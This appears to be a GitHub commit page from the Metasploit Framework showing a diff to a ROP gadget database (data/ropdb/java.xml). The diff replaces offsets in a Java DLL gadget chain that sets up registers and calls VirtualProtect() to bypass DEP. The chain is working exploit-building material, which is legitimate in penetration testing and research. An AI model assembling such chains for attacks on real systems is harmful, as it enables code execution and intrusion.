Skip to content

Commit a9e51e3

Browse files
author
jvazquez-r7
committed
Merge branch 'java_rop_update' of https://github.com/wchen-r7/metasploit-framework into wchen-r7-java_rop_update
2 parents 6618c09 + be9d4ec commit a9e51e3

File tree

1 file changed

+20
-14
lines changed

1 file changed

+20
-14
lines changed

data/ropdb/java.xml

Lines changed: 20 additions & 14 deletions
Original file line numberDiff line numberDiff line change
@@ -6,22 +6,28 @@
66
</compatibility>
77

88
<gadgets base="0x7c340000">
9-
<gadget offset="0x0000252c">POP EBP # RETN</gadget>
10-
<gadget offset="0x0000252c">skip 4 bytes</gadget>
11-
<gadget offset="0x0002c55a">POP EBX # RETN</gadget>
12-
<gadget value="0x00000400">0x00000400-> ebx</gadget>
13-
<gadget offset="0x00005249">POP EDX # RETN</gadget>
14-
<gadget value="0x00000040">0x00000040-> edx</gadget>
15-
<gadget offset="0x000011c0">POP ECX # RETN</gadget>
16-
<gadget offset="0x00051897">Writable location</gadget>
17-
<gadget offset="0x0000b8d7">POP EDI # RETN</gadget>
18-
<gadget offset="0x00006c0b">RETN (ROP NOP)</gadget>
19-
<gadget offset="0x00026fa6">POP ESI # RETN</gadget>
9+
<gadget offset="0x00024c66">POP EBP # RETN</gadget>
10+
<gadget offset="0x00024c66">skip 4 bytes</gadget>
11+
<gadget offset="0x00004edc">POP EAX # RETN</gadget>
12+
<gadget value="FFFFFBFF">0x00000201</gadget>
13+
<gadget offset="0x00011e05">NEG EAX # RETN</gadget>
14+
<gadget offset="0x000136e3">POP EBX # RETN</gadget>
15+
<gadget value="0xffffffff"></gadget>
16+
<gadget offset="0x00005255">INC EBX # FPATAN # RETN</gadget>
17+
<gadget offset="0x0001218e">ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN</gadget>
18+
<gadget offset="0x00005937">POP EDX # RETN</gadget>
19+
<gadget value="0xffffffc0">0x00000040</gadget>
20+
<gadget offset="0x00011eb1">NEG EDX # RETN</gadget>
21+
<gadget offset="0x0002c5b9">POP ECX # RETN</gadget>
22+
<gadget offset="0x00051e67">Writable location</gadget>
23+
<gadget offset="0x00002e58">POP EDI # RETN</gadget>
24+
<gadget offset="0x0000d202">RETN (ROP NOP)</gadget>
25+
<gadget offset="0x0000f8f4">POP ESI # RETN</gadget>
2026
<gadget offset="0x000015a2">JMP [EAX]</gadget>
21-
<gadget offset="0x000362fb">POP EAX # RETN</gadget>
27+
<gadget offset="0x00004edc">POP EAX # RETN</gadget>
2228
<gadget offset="0x0003a151">ptr to VirtualProtect()</gadget>
23-
<gadget offset="0x00038c81">PUSHAD # ADD AL,0EF # RETN</gadget>
24-
<gadget offset="0x00005c30">ptr to 'push esp # ret</gadget>
29+
<gadget offset="0x00038c81">,PUSHAD # ADD AL,0EF # RETN</gadget>
30+
<gadget offset="0x00005c30">ptr to 'push esp # ret</gadget>
2531
</gadgets>
2632
</rop>
2733
</db>

0 commit comments

Comments
 (0)